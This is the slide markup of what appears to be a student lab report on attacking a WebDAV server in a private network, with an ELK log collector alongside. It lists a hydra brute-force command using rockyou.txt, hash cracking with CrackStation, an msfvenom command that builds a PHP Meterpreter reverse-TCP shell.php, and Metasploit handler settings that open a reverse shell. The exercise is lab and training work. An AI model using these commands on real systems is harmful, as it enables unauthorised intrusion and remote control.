              <a:rPr kumimoji="0" lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> –P rockyou.txt –s 80 –f –</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> 192.168.1.105 http-get /</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>company_folders</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </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A54473A3-16AC-4627-802D-D0DA3F75F0A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2073390" y="2283807"/>
            <a:ext cx="5731510" cy="1864360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{250D6D53-754E-4CC0-B140-8109A3BD70E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1971669" y="1926230"/>
            <a:ext cx="458585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000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Screen output: </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-AU"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0352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Code/Command used for for: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> vulnerability attack</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 name="Google Shape;1162;p65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8BF8C5D-D9F2-4DEB-AFBE-E8A3602CFBB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311932" y="812800"/>
            <a:ext cx="1558432" cy="3973946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="1453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1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>CrackStation was used to crack the once the hash key was obtained in the hidden file.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400" b="0" i="1"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1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>File Manager was used to copy the payload for the metrosploit attack to the webdav direcotry.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="1400" b="0" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0CB0465-2239-445B-842F-ABAB8CE07095}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2308916" y="1190235"/>
            <a:ext cx="3627755" cy="1641118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B484E3E0-0550-43E5-AC7E-F61C4BAF3453}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589262" y="2956611"/>
            <a:ext cx="2768775" cy="1830135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F0B3CB9-3177-465C-A8E1-77BED75AB0D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2189019" y="812800"/>
            <a:ext cx="458585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000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Screen outputs: </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-AU"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55779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Code/Command used for: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Metasploit attack</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5" name="Google Shape;1162;p65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8BF8C5D-D9F2-4DEB-AFBE-E8A3602CFBB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311932" y="812800"/>
            <a:ext cx="1558432" cy="3973946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="1453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AU" sz="1400" b="0" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1400" b="0" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>sfvenom was used to create the payload file.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400" b="0" i="1"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400" b="0" i="1"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400" b="0" i="1"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 sz="1400" b="0" i="1"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AU" sz="1400" b="0" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1400" b="0" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>sfconsole was used to setup a reverse shell</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="1400" b="0" i="1"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9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F0B3CB9-3177-465C-A8E1-77BED75AB0D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1925781" y="750457"/>
            <a:ext cx="7003473"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000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Command: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700" b="0" i="1"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err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> –p php/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>meterpreter_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0"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LHOST=192.168.1.105 LPORT=80 –f raw &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-AU"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5F131A62-EEC0-4C1B-B215-419A0DD3D49A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5266863" y="1119584"/>
            <a:ext cx="3662391" cy="1042336"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D50ACD31-2B7F-4181-AC24-2FAADF2FBB86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5174674" y="750457"/>
            <a:ext cx="16177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000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Screen output: </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-AU"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4B9B255B-FC1B-4B2F-A7DC-126C874E399E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1988127" y="2417397"/>
            <a:ext cx="7003473"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000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Commands: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400" b="0" i="1"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use exploit/multi/handler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LHOST 192.168.1.90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LPORT 4444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set payload php/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>reverse_tpc</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1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exploit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Shell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0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-AU"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TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{563E0E25-1503-4A7A-BFB6-2FDAD23113D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5174674" y="2388720"/>
            <a:ext cx="25215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dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Screen output: </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-AU"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4" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E77B2A9B-7B91-4E5A-A293-194F37326BF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5266863" y="2747392"/>
            <a:ext cx="3662391" cy="2108626"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2438684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273600" y="915841"/>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a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pP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1058" name="Google Shape;1058;p57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7056300" y="690800"/>
            <a:ext cx="1814100" cy="40044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5BF3A37B-3C7E-4EA7-B2C1-A65513C4AD9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7056300" y="809042"/>
            <a:ext cx="1814100" cy="4004400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7D6193E-0BD2-4170-9EC3-B56F8F5F8DB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="113414" y="692652"/>
            <a:ext cx="6859786" cy="417239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8" name="Google Shape;1068;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9" name="Google Shape;1069;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5" name="Google Shape;1075;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6" name="Google Shape;1076;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7" name="Google Shape;1077;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1526162258"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419800" y="1198750"/>
          <a:ext cx="8346600" cy="3577125"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{22C2846D-6DAD-4640-8CFD-54061075D8CE}</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 sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Kali</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AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Attacker</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AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Victim (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1200" dirty="0" err="1">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>WebDav</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>)</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AU" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ELK (log collector)</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 sz="1200" dirty="0">
